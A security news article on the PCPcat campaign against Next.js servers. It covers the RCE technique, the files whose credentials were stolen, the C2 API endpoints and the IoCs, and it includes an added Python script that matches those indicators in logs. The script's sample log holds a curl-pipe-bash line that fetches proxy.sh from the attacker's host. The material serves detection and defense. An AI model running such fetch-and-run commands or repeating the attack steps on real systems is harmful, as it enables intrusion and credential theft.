PCPcat scanners, distributed via the react.py malware, probe public Next.js deployments for remote code execution flaws. Attackers use prototype pollution in JSON payloads to inject commands via child_process.execSync(), confirming RCE with an ‘id’ test before extracting credentials from .env files, SSH keys, AWS configs, Docker tokens, Git credentials, and bash history.
According to Mario Candela’s analysis, the compromised hosts then download proxy.sh from 67.217.57.240:666, installing GOST SOCKS5 proxy, FRP reverse tunnels, and persistent systemd services like pcpcat-gost.service.
The command-and-control server at 67.217.57.240:5656 runs an unauthenticated API, publicly leaking stats via GET /stats: 91,505 IPs scanned, 59,128 successes, batch size of 2,000 random IPs.
Nodes fetch targets via GET /domains?client=<ID>, exfiltrate data through POST /result (up to 2MB JSON payloads), and check health at /health. Candela’s honeypot reconnaissance confirmed data ingestion, with FRP tunneling on port 888 enabling pivoting.
| Endpoint | Purpose | Status |
|---|---|---|
| /domains?client=<ID> | Target assignment | Active |
| /result | Credential exfiltration | Accepts data |
| /stats | Campaign metrics | Exposes 59K compromises |
| /health | Server check | Responsive |
Key IoCs include C2 IPs (67.217.57.240 ports 666/888/5656), files (/opt/pcpcat/*, ~/.pcpcat_installed), processes (gost -L socks5://:1080, frpc), and logs (“UwU PCP Cat was here~”, t.me/Persy_PCP). Honeypots captured Docker API abuse on port 2375 for containerized persistence.
Detection rules cover Suricata alerts for /result POSTs with “env” payloads and YARA for react.py strings like “CVE-2025-29927” and “PCPcat”.
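A host-side triage check built from the indicators above, as an added example that is not part of the original article or of Candela’s published rules; the log lines are constructed for the test and the regexes are assumptions that cover only the IoCs the article names (C2 address and ports, /opt/pcpcat/, ~/.pcpcat_installed, gost and frpc processes, the pcpcat-gost.service unit, and the tag strings):

```python
import re

# Each rule maps a name to a regex applied to one log line at a time.
# Patterns are hand-written from the indicators in the write-up above.
PCPCAT_RULES = {
    "c2_connection": re.compile(r"\b67\.217\.57\.240:(666|888|5656)\b"),
    "staging_paths": re.compile(r"(/opt/pcpcat/|\.pcpcat_installed)"),
    "proxy_processes": re.compile(r"(gost\s+-L\s+socks5://:1080|\bfrpc\b)"),
    "systemd_unit": re.compile(r"pcpcat-gost\.service"),
    "tag_strings": re.compile(
        r"(UwU PCP Cat was here~|t\.me/Persy_PCP|t\.me/teampcp|CVE-2025-29927)"
    ),
}


def scan_lines(lines):
    """Return (rule_name, line) for every rule that matches each line.

    A single line can produce several hits, e.g. a gost launch from
    /opt/pcpcat/ matches both staging_paths and proxy_processes.
    """
    hits = []
    for line in lines:
        for name, rx in PCPCAT_RULES.items():
            if rx.search(line):
                hits.append((name, line))
    return hits


def summarize(lines):
    """Count hits per rule; a quick triage view over a syslog extract."""
    counts = {}
    for name, _ in scan_lines(lines):
        counts[name] = counts.get(name, 0) + 1
    return counts


# Constructed sample syslog lines (not real captures) for a local run.
SAMPLE_LOG = [
    "Apr 10 12:01:07 web01 sshd[2213]: Accepted publickey for deploy from 10.0.0.5",
    "Apr 10 12:01:09 web01 bash: curl -s http://67.217.57.240:666/proxy.sh | bash",
    "Apr 10 12:01:10 web01 systemd[1]: Started pcpcat-gost.service.",
    "Apr 10 12:01:11 web01 bash: /opt/pcpcat/gost -L socks5://:1080",
    "Apr 10 12:01:12 web01 cron[1200]: (root) CMD (run-parts /etc/cron.hourly)",
]

if __name__ == "__main__":
    for name, line in scan_lines(SAMPLE_LOG):
        print(f"[{name}] {line}")
```

Feed it a journalctl or auth.log export; any hit on c2_connection or systemd_unit on a Next.js host warrants the credential rotation the article recommends.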
Attributed to “PCP Cat” via Telegram channels t.me/teampcp, the campaign maps to MITRE ATT&CK techniques like T1190 (public app exploit) and T1552 (unsecured credentials).
Projections estimate 41,000 daily compromises, resulting in the harvesting of 300K+ credentials for cloud takeovers or resale. Next.js users must patch urgently, block C2 domains, rotate keys, and monitor for systemd anomalies.
The post Operation PCPcat Hacked 59,000+ Next.js/React Servers Within 48 Hours appeared first on Cyber Security News.